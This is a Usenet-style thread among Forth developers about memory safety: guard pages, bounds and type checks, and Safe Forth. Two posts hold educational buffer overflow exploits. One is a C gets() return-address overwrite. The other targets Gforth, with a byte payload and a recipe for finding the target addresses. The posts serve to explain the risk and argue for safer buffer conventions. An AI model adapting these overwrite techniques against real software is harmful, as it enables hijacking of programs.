On gforth-fast, with the data stack being empty:

: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
Backtrace:
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw

Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the guard page. Instead, the text
interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
as:

$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp

With the gforth engine, a similar scenario (involving DROP) is avoided
because in this engine DROP loads the value being dropped exactly to
trigger stack underflow reports where they happen:

$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp

Neither the deep PICK nor the loop that just NIPs or DROPs occur in
practice.

The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like

drop 1

in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.

Post by Krishna Myneni
To make stack access memory safe, there has to be bounds checks on
reading and writing from/to stacks. This suggests that stacks should be
arrays and stack operations always involve array read/write from arrays
with enforced bounds checking e.g. something like

With guard pages, that's not necessary. The normal bounded-depth
stack accesses (of words like 2DROP or 2OVER) are sure to hit the
guard pages if the stack is out-of-bounds; you may want to perform an
otherwise unnecessary load on words like NIP, DROP, 2DROP etc. that do
not otherwise use (and thus load) the stack values that they consume,
but that's much cheaper than putting bounds checks on every stack
access. For unbounded stack-access words like PICK, a bounds check is
appropriate.
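
As a rough C sketch of that last point (not Gforth's code): only the unbounded word carries an explicit depth check, while the fixed-depth words would rely on the guard pages. The type dstack and the function checked_pick are hypothetical names, and the sketch assumes a downward-growing stack described by a top pointer and a bottom pointer.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

typedef long cell;

/* Hypothetical downward-growing data stack: sp points at the top item,
   bottom points one past the deepest possible item. */
typedef struct {
    cell *sp;
    cell *bottom;
} dstack;

/* PICK with an explicit depth check; u = 0 copies the top item. */
bool checked_pick(const dstack *s, size_t u, cell *out)
{
    assert(s != NULL && out != NULL && s->sp <= s->bottom);
    size_t depth = (size_t)(s->bottom - s->sp);
    if (u >= depth)
        return false;               /* would read past the stack bottom */
    *out = s->sp[u];
    return true;
}
```

A call such as checked_pick(&s, 600, &x) on a shallow stack then reports failure instead of silently reading memory 600 cells away.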

- anton

minforth

2024-03-03 08:21:30 UTC

You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.

In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.

Krishna Myneni

2024-03-03 13:07:07 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes. Ideally
accompanied by a test suite so that every Forth system developer can
check their own system.

I'm not smart enough for a top down approach to this problem. The Forth
approach is one that I can take though. Start with small well-defined
problems, and try to find solutions for those. Build up a bigger picture
from those solutions.

--
Krishna

minforth

2024-03-03 16:08:26 UTC

That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....

For instance, I wouldn't define how to react on
0 BASE !
that could lead to a plethora of system-dependent crashes.
Or on
-1. 3 UM/MOD
probably throw exception code -11 for result out of range
even when 'range' is undeclared or only implicit.

OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Krishna Myneni

2024-03-03 23:02:44 UTC

Post by minforth
That's patchwork, but if it is sufficient for a program,
good for the program. As for language safety....

...

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for Forth
systems which don't address safety concerns will rapidly drop to zero.

--
Krishna

minforth

2024-03-04 07:52:28 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

Krishna Myneni

2024-03-04 13:06:38 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses has
saved me considerable debugging time -- usually just the stack
order is incorrect, but the error can manifest in more complex ways as well.

I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet-facing applications. The shift in
academia towards those languages appears to have already happened. My
daughter's first year CS class uses Python.

--
Krishna

minforth

2024-03-04 14:20:09 UTC

Post by minforth
OTOH I doubt that there is any demand for a paranoia Forth
with safety belts and suspenders and alarm whistles.

Perhaps not, but I wrote my Forth system to provide some hand-holding,
primarily for my own needs. My expectation is that the demand for
Forth systems which don't address safety concerns will rapidly drop to
zero.

IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site). I've already wondered how much convincing
had to be done for NASA not to disqualify Forth.

The trend has been to go to "memory-safe" languages. There are many
instances in which simple run-time type checking for addresses have
resulted in saving me considerable debugging time -- usually just stack
order is incorrect, but the error can manifest in more complex ways as well.
I don't have any particular insight into the trends other than following
the news. I think there will be even greater pressure going forward to
use memory-safe languages for internet facing applications. The shift in
academia towards those languages appears to have already happened.

This is why WebAssembly is on the rise. Many languages can already be
compiled to wasm. See
https://webassembly.org/docs/security/

However, I found only a few wasm-based Forths on the net.

Paul Rubin

2024-03-04 20:17:12 UTC

Post by minforth
IIRC there have been a few Forth applications at NASA and for astronomy
(e.g. see Forth Inc. web site).

I wonder if any of those applications were written in the current
century.

Anton Ertl

2024-03-03 16:14:27 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.

It was certainly an interesting aspect of my work on Safe Forth that I
first had to understand better what memory safety is; I had the "I
know it when I see it" kind of understanding, but that was not enough.
But I succeeded in understanding it better, and you can read the paper
if you want to know more about it.

Post by minforth
Analyses on the subject are dominated by the following: Memory errors,
type errors, range errors, race condition errors.

Safe Forth only tries to solve memory errors. That makes it necessary
to deal with some type errors and some range errors, but not all of
them, and there are no ambitions at the moment to harden Safe Forth
more against those. My idea on how to perform multitasking in Safe
Forth does not provide shared memory, so there are no race conditions.

Post by minforth
In order to develop Forth more in this direction, we would first need
a specification on "Hardened Forth" that is dedicated to these error
areas - and also marks UBs with defined exception codes.

I know "UB" from the C language lawyers. They love the concept of
"undefined behaviour" so much that they have created a 2-letter
acronym for it. A safe language does not have undefined behaviour,
and if you define the behaviour on some kind of condition to perform
an exception, that behaviour is certainly not undefined.

- anton

minforth

2024-03-03 19:56:44 UTC

Don't look elsewhere for UBs, the Forth Standard is chock-full of "ambiguous conditions".

Paul Rubin

2024-03-03 19:32:46 UTC

Post by minforth
You can run around in circles here, the basic problem is that there is
no formal specification for what a safe programming language is.

From https://en.wikipedia.org/wiki/Ada_(programming_language)#History :

HOLWG crafted the Steelman language requirements, a series of
documents stating the requirements they felt a programming language
should satisfy. Many existing languages were formally reviewed, but
the team concluded in 1977 that no existing language met the
specifications.

They put out a call for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.

minforth

2024-03-03 20:00:27 UTC

Post by Paul Rubin
They put out for proposals for a new language to be designed. The
eventual winner was Ada, but that choice came with some controversy at
the time. There were competing proposals that some people felt were
less bloated and still fulfilled the intended goals.

Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.

Paul Rubin

2024-03-03 22:08:29 UTC

Post by minforth
Misra-C is an example. There is no language specification, but quite a
number of rules against which a C program can be checked.

Misra-C has some sensible rules, but it's still C, which comes nowhere
near meeting the requirements that the working group (that chose Ada)
was looking for. Maybe some subset of C++ could have done it.
C doesn't have nearly enough type safety.

Krishna Myneni

2024-03-03 12:58:02 UTC

Post by Anton Ertl
*the terminal*:3:13: error: Floating-point stack overflow
*the terminal*:4:8: error: Floating-point stack underflow

Yes, that is not their intention and not the intention of these
examples. The intention of these examples is to show that any memory
access will be interpreted as a stack underflow or overflow if it is
to a certain range of addresses.
A more serious issue is that, as implemented in Gforth (in particular,
gforth-fast), stack underflows can be undetected in some cases: On
600 pick ok 1
: foo 600 0 ?do nip loop cr . ; foo
0
*the terminal*:1:33: error: Stack underflow
: foo 600 0 ?do nip loop cr . ; >>>foo<<<
kernel/basics.fs:312:27: 0 $7F30E3BDFE10 throw
Note that FOO actually performs the "cr .", so the stack underflow is
not detected by an access to the guard page. Instead, the text
interpreter checks the stack pointer and reports a stack underflow.
The non-detection of the stack underflow is because NIP is implemented
$7F30E3C72C90 nip 1->1
7F30E3917557: add r13,$08 #update sp
With the gforth engine, a similar scenario (involving DROP) is avoided
because in this engine DROP loads the value being dropped exactly to
$7F55EBFA6C98 drop 0->0
7F55EBAC51C0: mov $50[r13],r15 #save ip (for accurate backtraces)
7F55EBAC51C4: add r15,$08 #update ip
7F55EBAC51C8: mov rax,[r14] #load dropped value
7F55EBAC51CB: add r14,$08 #update sp
Neither the deep PICK nor the loop that just NIPs or DROPs occur in
practice.
The motivation for the otherwise unnecessary load in DROP (in gforth)
is code sequences like
drop 1
in cases where the stack is empty. The load in DROP results in
detecting the stack underflow at the DROP rather than at the "1".
Reporting a stack underflow at an operation that just pushes can
produce a WTF moment in the programmer; the gforth engine exists to
make debugging easier, and that includes avoiding such moments.

That's a pretty good approach, to use guard pages for stack access words
which are guaranteed to trigger a signal, and use bounds checking for
the remaining ones.

The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternate
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.

--
Krishna

Anton Ertl

2024-03-03 15:51:07 UTC

Post by Krishna Myneni
The intent of the stack array access was to avoid stack pointer
arithmetic altogether. Stack array access words provide a safe alternate
to doing stack pointer arithmetic in Forth code. Pointer arithmetic
appears to be the source of a lot of memory safety problems.

At the machine level and the standard Forth level, every array access
performs address arithmetics. Given that standard Forth does not
expose the implementation of the stacks, there is no need to use some
specific implementation for them. One may wonder, though, if using 4
stacks with guard pages around them (i.e., at least 9 pages per task,
set up with 6 system calls) is too expensive for multi-tasking; I
think Gforth currently only does it for the main task.

There are architectures (in particular, the 80286) that provide
hardware support for treating stretches of memory as segments with
bounds checking, and the idea probably was that every array becomes a
segment (not sure about structures; the 80286 supports only 8192
segments, which seems a little low if every structure needs a segment),
but anyway, using segments was too cumbersome, slow and limited, so
they have fallen by the wayside in the descendants of the
architecture (IA-32, AMD64).

In any case, yes, in Safe Forth there are no addresses at the language
level. You have objects with value-flavoured fields, and arrays with
indexed-fetch and indexed-store words. But in the implementation of
Safe Forth, there will certainly be address arithmetics.

- anton

Anton Ertl

2024-03-02 16:36:26 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Depends on what you mean with "runtime checks". Gforth does not
compile extra code for stack depth checks, and yet:

: RT1 2 3e recurse ; ok
: RT2 drop fdrop recurse ; ok
rt1
*the terminal*:3:1: error: Floating-point stack overflow

>>>rt1<<<

rt2
*the terminal*:4:1: error: Stack underflow

>>>rt2<<<

Here's the code for the two words:

see-code rt1
$7FEEF9B56C60 lit 1->1
$7FEEF9B56C68 #2
7FEEF97FB523: mov $00[r13],r8
7FEEF97FB527: sub r13,$08
7FEEF97FB52B: mov r8,$08[rbx]
$7FEEF9B56C70 flit 1->1
$7FEEF9B56C78 #4613937818241073152
7FEEF97FB52F: add rbx,$20
7FEEF97FB533: movsd [r12],xmm15
7FEEF97FB539: movsd xmm15,-$08[rbx]
7FEEF97FB53F: sub r12,$08
$7FEEF9B56C80 call 1->1
$7FEEF9B56C88 RT1
7FEEF97FB543: mov rax,$08[rbx]
7FEEF97FB547: sub r14,$08
7FEEF97FB54B: add rbx,$10
7FEEF97FB54F: mov [r14],rbx
7FEEF97FB552: mov rbx,rax
7FEEF97FB555: mov rax,[rbx]
7FEEF97FB558: jmp eax
$7FEEF9B56C90 ;s 1->1
7FEEF97FB55A: mov rbx,[r14]
7FEEF97FB55D: add r14,$08
7FEEF97FB561: mov rax,[rbx]
7FEEF97FB564: jmp eax
ok
see-code rt2
$7FEEF9B56CC0 drop 1->1
7FEEF97FB566: mov r8,$08[r13]
7FEEF97FB56A: add r13,$08
$7FEEF9B56CC8 fdrop 1->1
7FEEF97FB56E: mov rax,r12
7FEEF97FB571: lea r12,$08[r12]
7FEEF97FB576: movsd xmm15,$08[rax]
$7FEEF9B56CD0 call 1->1
$7FEEF9B56CD8 RT2
7FEEF97FB57C: mov rax,$18[rbx]
7FEEF97FB580: sub r14,$08
7FEEF97FB584: add rbx,$20
7FEEF97FB588: mov [r14],rbx
7FEEF97FB58B: mov rbx,rax
7FEEF97FB58E: mov rax,[rbx]
7FEEF97FB591: jmp eax
$7FEEF9B56CE0 ;s 1->1
7FEEF97FB593: mov rbx,[r14]
7FEEF97FB596: add r14,$08
7FEEF97FB59A: mov rax,[rbx]
7FEEF97FB59D: jmp eax

Look, Ma, no software run-time checks. It's done with the MMU
hardware.
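
For readers who have not set up guard pages themselves, here is a minimal POSIX sketch in C of the general technique. It is not Gforth's code: the names guarded_area, guarded_area_create and guarded_area_destroy and the arbitrary limit of 1024 pages are hypothetical. The whole region is mapped inaccessible first, then only the middle is opened for reading and writing, so the first and last page stay as guards.

```c
#define _DEFAULT_SOURCE             /* for MAP_ANONYMOUS on glibc */
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

typedef struct {
    void  *base;                    /* start of the mapping (low guard page) */
    char  *usable;                  /* first readable/writable byte */
    size_t usable_len;
    size_t total_len;
} guarded_area;

/* Map pages usable pages with one inaccessible guard page on each side.
   Returns 0 on success, -1 on failure. */
int guarded_area_create(guarded_area *ga, size_t pages)
{
    assert(ga != NULL);
    long page = sysconf(_SC_PAGESIZE);
    if (page <= 0 || pages == 0 || pages > 1024)
        return -1;
    size_t psz   = (size_t)page;
    size_t total = (pages + 2) * psz;

    /* Everything starts out inaccessible, guard pages included. */
    void *base = mmap(NULL, total, PROT_NONE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return -1;

    /* Open up only the middle part. */
    if (mprotect((char *)base + psz, pages * psz,
                 PROT_READ | PROT_WRITE) != 0) {
        munmap(base, total);
        return -1;
    }
    ga->base       = base;
    ga->usable     = (char *)base + psz;
    ga->usable_len = pages * psz;
    ga->total_len  = total;
    return 0;
}

int guarded_area_destroy(guarded_area *ga)
{
    assert(ga != NULL);
    return munmap(ga->base, ga->total_len);
}
```

An access one byte before usable or one byte past usable + usable_len then faults in hardware. Turning that fault into a Forth-level "stack underflow" report additionally needs a signal handler, which is left out here.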

- anton

dxf

2024-03-03 01:58:04 UTC

Post by minforth
: RT1 2 3e recurse ;
: RT2 drop fdrop recurse ;

Garbage in, garbage out.

What do I use while developing a recursive function: ?STACK.
Chances of needing it in a completed application are about
the same as winning the lottery.

minforth

2024-03-04 11:06:05 UTC

Post by dxf
What do I use while developing a recursive function: ?STACK.

Yes and no:

Gforth 0.7.9_20200709
Authors: Anton Ertl, Bernd Paysan, Jens Wilke et al., for more type `authors'
Copyright © 2019 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>
Gforth comes with ABSOLUTELY NO WARRANTY; for details type `license'
Type `help' for basic help
drop depth
*the terminal*:1:1: error: Stack underflow

>>>drop<<< depth

: TEST drop depth ; ok
test <<<--- CRASH!!

Paul Rubin

2024-03-02 18:39:23 UTC

Post by dxf
It's good to have an application that works as planned but how does one
that misbehaves translate to 'security risk'

If the misbehaviour is related to the program input, and the input is
supplied by an attacker, they will look for an input that breaks security.

Post by dxf
and how does 'memory-safe' prevent that?

"Prevent" is too strong a term, but it helps. A classic attack is when
you have a memory buffer on the stack, but accesses to it are not bounds
checked. That means the attacker can overwrite stuff on the stack after
the memory buffer, such as the procedure's return address. That means
the attacker can make the program jump to the location of their choice,
i.e. a location containing a security attack. See:

https://en.wikipedia.org/wiki/Return-oriented_programming

Post by dxf
That may be their belief (fancy word for hope) but do they have anything
to back it up?

It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.

Regarding runtime checks: in C++, if you access an array as a[i], there
is no runtime check and thus there is a potential out-of-range memory
access. If you instead say a.at(i), there is a runtime check, so you
get the right result if the index is in range, and an exception is
raised otherwise. What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the CPU cache. So this says
runtime checks are usually worth the small cost.
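
The same contrast can be sketched in plain C, which has no exceptions, so the checked accessor reports failure through its return value instead. The names int_array and array_at are hypothetical and only stand in for the a.at(i) idea.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* An array that carries its own length. */
typedef struct {
    int   *data;
    size_t len;
} int_array;

/* Checked read in the spirit of a.at(i): one compare and branch before
   the load. Returns false instead of reading out of range. */
bool array_at(const int_array *a, size_t i, int *out)
{
    assert(a != NULL && out != NULL);
    if (i >= a->len)
        return false;
    *out = a->data[i];
    return true;
}
```

The check is a single unsigned comparison that is almost always predicted correctly, which fits the observation that its cost is hard to measure next to the memory access itself.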

minforth

2024-03-02 19:47:05 UTC

You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.

An example:

: TE1 -1 dup c! ;

TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.

Even C, vulnerable as it is, has assert macros for compiling
in DEBUG mode. In Forth, you have to create asserts yourself.
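
For reference, a small C sketch of the two kinds of checks mentioned here: a compile-time check on a constant and run-time asserts that vanish when NDEBUG is defined. The names FILL_CHAR and store_char are hypothetical; assert and _Static_assert (C11) are standard C.

```c
#include <assert.h>
#include <limits.h>
#include <stddef.h>

#define FILL_CHAR 42                /* hypothetical constant to be stored */

/* Compile-time trap: a constant such as -1 here would stop the build. */
_Static_assert(FILL_CHAR >= 0 && FILL_CHAR <= UCHAR_MAX,
               "FILL_CHAR must fit in a char");

/* Run-time traps: active in a debug build, compiled out entirely when
   NDEBUG is defined (the usual release setting). */
void store_char(unsigned char *addr, long value)
{
    assert(addr != NULL);
    assert(value >= 0 && value <= UCHAR_MAX);
    *addr = (unsigned char)value;
}
```

The compile-time form only helps when the offending value is a constant the compiler can see, as the -1 in TE1 is; a value computed at run time still needs the run-time form.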

Anton Ertl

2024-03-02 22:29:49 UTC

Post by minforth
In Forth, you have to create asserts yourself.

Or you can use Gforth, which has them since at least gforth-0.2
(released 1996). See
<https://gforth.org/manual/Assertions.html#index-assert_0028>.

- anton

Krishna Myneni

2024-03-03 13:03:01 UTC

Post by minforth
You can compile in DEBUG/RELEASE mode, whereby runtime checks
are no longer included in RELEASE mode. But these are quasi
pre-mortem traps, just like guard pages - they do not make Forth
safer as a language, for that it would need a-priori error traps.
: TE1 -1 dup c! ;
TE1 contains two errors: -1 is not a char and -1 is not a permitted
memory address. It must be possible to catch these during compilation.

kForth, from its beginning, would never execute the C! in your example:

Ready!
: TE1 -1 dup c! ;
ok
TE1
Line 2: VM Error(-256): Not data type ADDR
TE1

It performs run-time type checking for address arguments, at about 15%
cost in speed for most benchmarks.
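
To give an idea of what such a check involves, here is a small C sketch in which every cell carries a type tag and the store refuses anything that is not tagged as an address. It is not kForth's implementation; the names tagged_cell, make_ival, make_addr and store_byte are hypothetical, and the code -256 is simply borrowed from the error message shown above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef enum { TYPE_IVAL, TYPE_ADDR } cell_type;

/* A cell value together with its run-time type tag. */
typedef struct {
    cell_type type;
    intptr_t  value;
} tagged_cell;

enum { E_OK = 0, E_NOT_ADDR = -256 };   /* -256 as in the message above */

tagged_cell make_ival(intptr_t n)
{
    return (tagged_cell){ TYPE_IVAL, n };
}

tagged_cell make_addr(unsigned char *p)
{
    assert(p != NULL);
    return (tagged_cell){ TYPE_ADDR, (intptr_t)p };
}

/* C!-like store: only executes the write if addr really is an address. */
int store_byte(tagged_cell value, tagged_cell addr)
{
    if (addr.type != TYPE_ADDR)
        return E_NOT_ADDR;
    *(unsigned char *)addr.value = (unsigned char)value.value;
    return E_OK;
}
```

With this, the equivalent of "-1 dup c!" is rejected before the store, because the second -1 is tagged as an integer value, not as an address.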

--
Krishna

Anton Ertl

2024-03-02 22:21:19 UTC

Post by Paul Rubin
It's unclear what they mean, but it's certainly the case that studying
the historical corpus of CVE's tells us things about common types of
attacks. That tells us what areas need attention.

My impression from reading articles like
<https://lwn.net/Articles/961978/> and the discussions after them is
that in recent years CVEs have become a metric for evaluating security
researchers, and, like any other metric, are therefore gamed. So
these days a statistic about CVEs tells us only which kinds of bugs,
assumed to be vulnerabilities, are most often found by those
researchers.

Post by Paul Rubin
What I've found in practice is that there is almost no
slowdown. I suspect that the memory access itself is slower than the
range check, even when it usually is within the cpu cache.

On a modern OoO processor, if the program is dependence-bound rather
than resource-bound, the instructions for the range check cost very
little, because they do not add to the dependence chains in the usual
case (when the access is in range).

- anton

Krishna Myneni

2024-03-01 18:38:59 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages.

Which "renewed recent push" do you mean?

the ones that Paul Rubin mentioned.

--
km

Krishna Myneni

2024-03-02 05:16:53 UTC

Post by Krishna Myneni
I'm wondering what the CS Forth users and Forth systems developers make
of the renewed recent push for use of memory-safe languages. Certainly
Forth can add the type of contractual safety requirements e.g.,
implementing bounds checking, of a "memory-safe language". Do we need to
work on libraries for these provisions?
Opinions?

I played with a simple buffer overflow attack code in C, based on an
example I found at

https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

=== begin code ===
/*
Demonstrate buffer overflow exploit.
Adapted from the example at:

https://www.jsums.edu/nmeghanathan/files/2015/05/CSC437-Fall2013-Module-5-Buffer-Overflow-Attacks.pdf

Build with:
gcc -m32 -o exploit_demo exploit_demo.c

Normal run:
printf "abcdefg" | ./exploit_demo

Find the address of MaliciousCode() within the disassembled executable
objdump -S ./exploit_demo

from the listing above, note the 4-byte address of MaliciousCode
and put the address in the input string, from low-byte to high-byte.

Exploit Example: pass a string to overflow the buffer and run
exploit code
printf "abcdefghijklmnopqrst\x96\x91\x04\x08" | ./exploit_demo

replace the address 0x08049196 above with the one you obtained
from objdump command.

The exploit will cause MaliciousCode() to execute.
*/

#include <stdio.h>
#include <stdlib.h>

void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}

void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}

int main() {
GetInput();
return 0;
}
=== end code ===

It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).

--
Krishna

Anton Ertl

2024-03-02 08:04:01 UTC

Post by Krishna Myneni
#include <stdio.h>
#include <stdlib.h>
void MaliciousCode() {
printf("This code is malicious!\n");
printf("It will not execute normally.\n");
exit(0);
}
void GetInput() {
char buffer[8];
gets(buffer);
// puts(buffer);
}
int main() {
GetInput();
return 0;
}
=== end code ===
It will be a useful exercise to work up a similar example in Forth, as a
step to thinking about automatic hardening techniques (as opposed to
input sanitization).

Forth does not have an inherently unbounded input word like C's
gets(). And even typical C environments warn you when you compile
this code; e.g., when I compile it on Debian 11, I get:

|> gcc xxx.c
|xxx.c: In function ‘GetInput’:
|xxx.c:12:10: warning: implicit declaration of function ‘gets’; did you mean ‘fgets’? [-Wimplicit-function-declaration]
| 12 | gets(buffer);
| | ^~~~
| | fgets
|/usr/bin/ld: /tmp/ccC9Qbu7.o: in function `GetInput':
|xxx.c:(.text+0x3b): warning: the `gets' function is dangerous and should not be used.

So, they removed gets() from stdio.h, and added a warning to the
linker. "man gets" tells me:

|_Never use this function_
|[...]
|ISO C11 removes the specification of gets() from the C language, and
|since version 2.16, glibc header files don't expose the function
|declaration if the _ISOC11_SOURCE feature test macro is defined.

And when I follow the recipe in the comments, the result is a
segmentation fault. Things like ASLR prevent such easy ways to
reliably perform arbitrary code execution. The attacker still might
try to repeat the attack using one of the possible target addresses,
and eventually the random-number generator will actually produce the
layout that the exploit is designed for. Moreover, attackers have
found other, less time-consuming ways to cope with ASLR. Bottom line:
ASLR makes attacks harder, but it does not prevent them.

Anyway, there are plenty of ways to corrupt a Forth system, e.g., by
using MOVE in an unsafe way, or by using (the non-standard) PLACE or
+PLACE with a target buffer that's smaller than 256 bytes (and for
+PLACE, I would not be surprised if there are implementations around
that even write beyond the 256-byte boundary).
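
As a point of comparison, a PLACE-like operation that cannot overrun its target has to be told the target's capacity. A minimal C sketch, assuming the usual counted-string layout (one length byte followed by the characters); the name checked_place and the dst_cap parameter are hypothetical:

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Store src[0..len) as a counted string in dst, which has room for
   dst_cap bytes. Refuses if the count does not fit in one byte or if
   count byte plus characters would exceed the capacity. */
bool checked_place(const char *src, size_t len,
                   unsigned char *dst, size_t dst_cap)
{
    assert(src != NULL && dst != NULL);
    if (len > 255 || len + 1 > dst_cap)
        return false;
    dst[0] = (unsigned char)len;
    memmove(dst + 1, src, len);     /* memmove tolerates overlapping buffers */
    return true;
}
```

The price is an extra argument on every call, which is what passing buffers around together with their lengths amounts to.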

If you want an example, here's one that targets the Gforth version I
am currently working with:

: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;

create buffer1 8 allot

:noname buffer1 96 stdin read-line . ; execute
bye

When I put this into a file xploit.fs and then perform

printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs

I get the following output:

This code is malicious!
It will not execute normally.

Here the "setarch `uname -m` -R" is used to disable ASLR. Attackers
typically have no way to run programs this way (or if they have, they
don't need such an exploit to execute arbitrary code), but they have
other ways to work around ASLR.

In the example above the mistake is easy to see, but these kinds of
mistakes still happen.

It would be safer if we had the convention that buffers are always
passed around with their lengths. Then we could have a defining word

safebuffer ( u "name" -- )
\ name execution: ( -- addr u )

and in the code above one would write

8 safebuffer buffer1

:noname buffer1 stdin read-line . ; execute
bye

and there could not be a buffer overflow exploit.
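
The convention can be mirrored in C to show why the overflow disappears: the reader never sees an address without the matching length. This is only a sketch; the type safebuffer, the macro SAFEBUFFER and the function sb_read_line are hypothetical and do not correspond to any existing Forth word or C library call.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* A buffer that always travels together with its length. */
typedef struct {
    char  *addr;
    size_t len;
} safebuffer;

/* Defines the storage and the (addr, len) pair in one step, so the two
   cannot get out of sync. */
#define SAFEBUFFER(name, n) \
    static char name##_storage[n]; \
    static const safebuffer name = { name##_storage, (n) }

/* Reads one line into buf, never storing more than buf.len characters.
   The newline is consumed but not stored; an over-long line is
   continued on the next call. Returns false only at end of input with
   nothing read. */
bool sb_read_line(safebuffer buf, FILE *in, size_t *got)
{
    assert(in != NULL && got != NULL);
    size_t n = 0;
    int c = EOF;
    while (n < buf.len && (c = getc(in)) != EOF && c != '\n')
        buf.addr[n++] = (char)c;
    *got = n;
    return n > 0 || c != EOF;
}
```

After "SAFEBUFFER(buffer1, 8);" a call such as sb_read_line(buffer1, stdin, &n) has no separate length argument that a programmer could get wrong, which is the point of the convention.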

- anton

Anton Ertl

2024-03-02 09:57:01 UTC

Post by Anton Ertl
If you want an example, here's one that targets the Gforth version I
: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;
create buffer1 8 allot
:noname buffer1 96 stdin read-line . ; execute
bye
When I put this into a file xploit.fs and then perform
printf "01234567890123456789012345678901234567890123456789012345678901234567890123456789\x33\x5b\x57\x55\x55\x55\x00\x00\x68\xdc\xed\xe9\xff\x7f\x00\x00"|
setarch `uname -m` -R gforth xploit.fs
This code is malicious!
It will not execute normally.

I forgot to give a recipe for the printf above:

insert

' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop

right before the execute, and the dumps contain the bytes you have to
put into the printf after the 80th byte, in that order. I.e.:

: MaliciousCode ( -- )
." This code is malicious!" cr
." It will not execute normally." cr
bye ;

create buffer1 8 allot

:noname buffer1 96 stdin read-line . ;
' call -2 cells + 8 dump ' MaliciousCode sp@ 8 dump drop
execute
bye

and run it with

echo|setarch `uname -m` -R gforth xploit.fs

For the particular Gforth at hand, this produces:

7FFFE9E43160: 33 5B 57 55 55 55 00 00 - 3[WUUU..

7FFFE9AF6FF0: 68 DC ED E9 FF 7F 00 00 - h.......

exactly the bytes in the printf above.

- anton

